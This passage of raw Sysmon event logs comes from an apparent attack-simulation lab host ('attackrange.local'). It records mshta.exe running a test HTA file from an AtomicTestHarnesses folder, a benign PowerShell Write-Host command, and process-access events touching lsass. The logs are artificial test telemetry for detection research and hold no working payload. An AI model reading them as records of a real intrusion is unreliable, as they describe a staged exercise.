.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022622Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022621Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022620Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022619Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022618Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022617Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022616Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022615Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022614Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022613Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022612Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022611Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000022610Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.975{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000022609Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.945{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2706-00000000A301}4972C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022608Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.945{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2706-00000000A301}4972C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022607Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.945{7901BC46-5351-6008-2706-00000000A301}49721272C:\Windows\system32\conhost.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022606Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.945{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2706-00000000A301}4972C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 11241100x800000000000000022605Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.929{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4mjfc4cv.o43.ps12021-01-20 15:59:13.929 10341000x800000000000000022604Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.929{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022603Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.929{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022602Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.929{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022601Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.929{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022600Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.929{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022599Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.929{7901BC46-5351-6008-2306-00000000A301}33566040C:\Windows\System32\mshta.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022598Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.938{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 97e83464-b62c-4bdd-827e-3367eef7b71a; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" 10341000x800000000000000022597Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.929{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022596Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.898{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022595Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.898{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022594Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.898{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022593Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 